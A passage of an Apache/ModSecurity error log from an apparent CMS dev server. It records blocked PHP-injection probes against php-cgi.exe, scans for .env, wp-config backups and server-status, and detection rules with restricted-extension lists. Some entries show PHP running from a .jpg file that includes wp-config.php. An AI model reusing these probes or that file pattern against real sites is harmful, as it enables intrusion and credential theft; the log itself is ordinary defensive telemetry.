"WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aOTeExlpYANAlX-qTSCmDAAAAIw"] [Tue Oct 07 12:32:03.137330 2025] [:error] [pid 5694:tid 5714] [client 139.59.136.184:59518] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aOTeE9LATOVXNLk4iZkm7gAAAME"] [Tue Oct 07 12:32:03.707419 2025] [:error] [pid 5694:tid 5720] [client 64.226.65.160:36314] [client 64.226.65.160] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aOTeE9LATOVXNLk4iZkm9QAAAMY"] [Tue Oct 07 12:32:04.106681 2025] [:error] [pid 5694:tid 5730] [client 164.90.208.56:57450] [client 164.90.208.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aOTeFNLATOVXNLk4iZkm9wAAANA"] [Tue Oct 07 12:32:05.095113 2025] [authz_core:error] [pid 4855:tid 4992] [client 139.59.136.184:38114] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Tue Oct 07 12:32:05.120749 2025] [authz_core:error] [pid 4855:tid 5002] [client 139.59.136.184:38122] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Tue Oct 07 12:32:07.314347 2025] [authz_core:error] [pid 22148:tid 22169] [client 164.90.208.56:39752] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Tue Oct 07 12:32:07.528440 2025] [authz_core:error] [pid 22150:tid 22190] [client 64.226.65.160:41110] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Tue Oct 07 14:36:34.818439 2025] [:error] [pid 22250:tid 22273] [client 20.171.207.179:51690] [client 20.171.207.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aOT7QgxquoZpT4OQYBOhkAAAAdU"] [Tue Oct 07 14:38:44.270140 2025] [autoindex:error] [pid 22150:tid 22223] [client 20.171.207.179:58260] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 07 14:45:59.993648 2025] [core:error] [pid 22250:tid 22256] [client 20.171.207.179:54722] AH10244: invalid URI path (/assets/front/js/%url%) [Thu Oct 09 15:35:42.492459 2025] [:error] [pid 4320:tid 4333] [client 207.154.240.68:43582] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Oct 09 16:22:07.367303 2025] [:error] [pid 4545:tid 4569] [client 207.154.240.68:49778] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Oct 09 21:22:30.173111 2025] [:error] [pid 21259:tid 21263] [client 207.154.240.68:41222] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Oct 09 21:22:30.173354 2025] [:error] [pid 21259:tid 21263] [client 207.154.240.68:41222] PHP Warning: include(wp-config.php): Failed to open stream: No such file or directory in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 5, referer: https://www.google.com [Thu Oct 09 21:22:30.173463 2025] [:error] [pid 21259:tid 21263] [client 207.154.240.68:41222] PHP Warning: include(): Failed opening 'wp-config.php' for inclusion (include_path='.:') in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 5, referer: https://www.google.com [Thu Oct 09 21:22:30.173544 2025] [:error] [pid 21259:tid 21263] [client 207.154.240.68:41222] PHP Fatal error: Uncaught Error: Undefined constant "ABSPATH" in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg:8, referer: https://www.google.com [Thu Oct 09 21:22:30.173556 2025] [:error] [pid 21259:tid 21263] [client 207.154.240.68:41222] Stack trace:, referer: https://www.google.com [Thu Oct 09 21:22:30.173602 2025] [:error] [pid 21259:tid 21263] [client 207.154.240.68:41222] #0 /home/id/cms-1.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Thu Oct 09 21:22:30.173616 2025] [:error] [pid 21259:tid 21263] [client 207.154.240.68:41222] #1 {main}, referer: https://www.google.com [Thu Oct 09 21:22:30.173664 2025] [:error] [pid 21259:tid 21263] [client 207.154.240.68:41222] thrown in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 8, referer: https://www.google.com [Thu Oct 09 22:49:20.791154 2025] [:error] [pid 27271:tid 27339] [client 45.148.10.143:59840] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aOgRwDREMEilK5ZG0whCLgAAAFg"] [Thu Oct 09 22:52:21.844122 2025] [:error] [pid 1200:tid 1203] [client 45.148.10.143:53426] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aOgSdVPXZxnEWP0oSw5UHQAAAUE"] [Thu Oct 09 22:54:02.772468 2025] [access_compat:error] [pid 1023:tid 1043] [client 45.148.10.143:51016] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Fri Oct 10 00:44:58.722919 2025] [core:error] [pid 1023:tid 1048] [client 93.123.109.7:44868] Script timed out before returning headers: index.php [Fri Oct 10 00:44:58.775447 2025] [core:error] [pid 1200:tid 1223] [client 93.123.109.7:43436] Script timed out before returning headers: index.php [Sat Oct 11 00:55:49.976041 2025] [autoindex:error] [pid 6383:tid 6418] [client 91.231.89.23:33285] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 11 00:58:33.880003 2025] [autoindex:error] [pid 15084:tid 15106] [client 91.231.89.16:55413] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 11 01:10:23.962017 2025] [autoindex:error] [pid 6383:tid 6417] [client 91.231.89.103:52623] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 11 01:12:24.693366 2025] [autoindex:error] [pid 6291:tid 6343] [client 91.231.89.100:55827] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 11 01:16:48.278497 2025] [autoindex:error] [pid 6383:tid 6405] [client 91.231.89.21:55547] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 11 01:17:23.363028 2025] [autoindex:error] [pid 6291:tid 6350] [client 91.231.89.21:59407] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Oct 13 11:48:48.729437 2025] [access_compat:error] [pid 13241:tid 13244] [client 94.156.189.188:62040] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Mon Oct 13 11:48:50.157405 2025] [access_compat:error] [pid 13037:tid 13092] [client 94.156.189.188:62058] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/app/.env [Mon Oct 13 11:48:51.224077 2025] [access_compat:error] [pid 13037:tid 13071] [client 94.156.189.188:62080] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/Database [Mon Oct 13 11:58:51.669835 2025] [access_compat:error] [pid 13036:tid 13064] [client 94.156.189.188:54203] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Mon Oct 13 11:58:51.749198 2025] [access_compat:error] [pid 13241:tid 13260] [client 94.156.189.188:54206] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/app/.env [Mon Oct 13 11:58:51.835109 2025] [access_compat:error] [pid 13038:tid 13110] [client 94.156.189.188:54209] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/Database [Mon Oct 13 12:02:21.252984 2025] [access_compat:error] [pid 13038:tid 13091] [client 94.156.189.188:57780] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Mon Oct 13 12:02:22.139166 2025] [access_compat:error] [pid 13036:tid 13051] [client 94.156.189.188:57813] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/app/.env [Mon Oct 13 12:02:24.040298 2025] [access_compat:error] [pid 13038:tid 13099] [client 94.156.189.188:57838] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/Database [Mon Oct 13 18:05:35.695233 2025] [access_compat:error] [pid 13037:tid 13075] [client 3.27.29.247:49760] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/Datavase, referer: https://www.google.com/ [Mon Oct 13 18:05:41.439534 2025] [access_compat:error] [pid 13037:tid 13074] [client 3.27.29.247:49760] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/app/.env, referer: https://www.google.com/ [Mon Oct 13 18:05:51.195201 2025] [access_compat:error] [pid 13037:tid 13072] [client 3.27.29.247:49760] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env, referer: https://www.google.com/ [Tue Oct 14 23:13:54.964088 2025] [:error] [pid 12775:tid 12801] [client 20.242.104.10:5115] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Oct 16 12:40:15.016418 2025] [access_compat:error] [pid 17032:tid 17045] [client 18.142.179.75:39082] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Thu Oct 16 12:40:15.171815 2025] [access_compat:error] [pid 17032:tid 17056] [client 18.142.179.75:58392] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Thu Oct 16 12:40:15.324915 2025] [access_compat:error] [pid 17032:tid 17055] [client 18.142.179.75:39082] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/app/.env [Thu Oct 16 12:40:15.480129 2025] [access_compat:error] [pid 17032:tid 17047] [client 18.142.179.75:58392] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/app/.env [Thu Oct 16 12:40:15.633238 2025] [access_compat:error] [pid 17032:tid 17041] [client 18.142.179.75:39082] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/Datavase [Thu Oct 16 12:40:15.788460 2025] [access_compat:error] [pid 17032:tid 17042] [client 18.142.179.75:58392] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/Datavase [Thu Oct 16 12:42:31.476005 2025] [:error] [pid 16812:tid 16910] [client 18.142.179.75:43334] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.bak"] [unique_id "aPC-B0KS8iATyHh_zsDJGAAAAJE"] [Thu Oct 16 12:42:31.630407 2025] [:error] [pid 17032:tid 17055] [client 18.142.179.75:34240] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.bak"] [unique_id "aPC-B5NO0RbuDFrUVpVLjwAAANU"] [Thu Oct 16 12:42:31.784016 2025] [:error] [pid 16812:tid 16909] [client 18.142.179.75:43334] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.bak"] [unique_id "aPC-B0KS8iATyHh_zsDJGgAAAJA"] [Thu Oct 16 12:42:31.938164 2025] [:error] [pid 17032:tid 17046] [client 18.142.179.75:34240] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.bak"] [unique_id "aPC-B5NO0RbuDFrUVpVLkQAAAMw"] [Thu Oct 16 12:42:32.091493 2025] [:error] [pid 16812:tid 16917] [client 18.142.179.75:43334] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.old"] [unique_id "aPC-CEKS8iATyHh_zsDJGwAAAJg"] [Thu Oct 16 12:42:32.286348 2025] [:error] [pid 17032:tid 17035] [client 18.142.179.75:34240] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.old"] [unique_id "aPC-CJNO0RbuDFrUVpVLkgAAAME"] [Thu Oct 16 12:42:32.439916 2025] [:error] [pid 16812:tid 16911] [client 18.142.179.75:43334] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.old"] [unique_id "aPC-CEKS8iATyHh_zsDJHQAAAJI"] [Thu Oct 16 12:42:32.596518 2025] [:error] [pid 17032:tid 17054] [client 18.142.179.75:34240] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.old"] [unique_id "aPC-CJNO0RbuDFrUVpVLkwAAANQ"] [Thu Oct 16 12:43:00.592318 2025] [:error] [pid 16812:tid 16915] [client 18.142.179.75:43334] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/config.ini"] [unique_id "aPC-JEKS8iATyHh_zsDJcgAAAJY"] [Thu Oct 16 12:43:00.746592 2025] [:error] [pid 17032:tid 17045] [client 18.142.179.75:34240] [client 18.142.179.75] 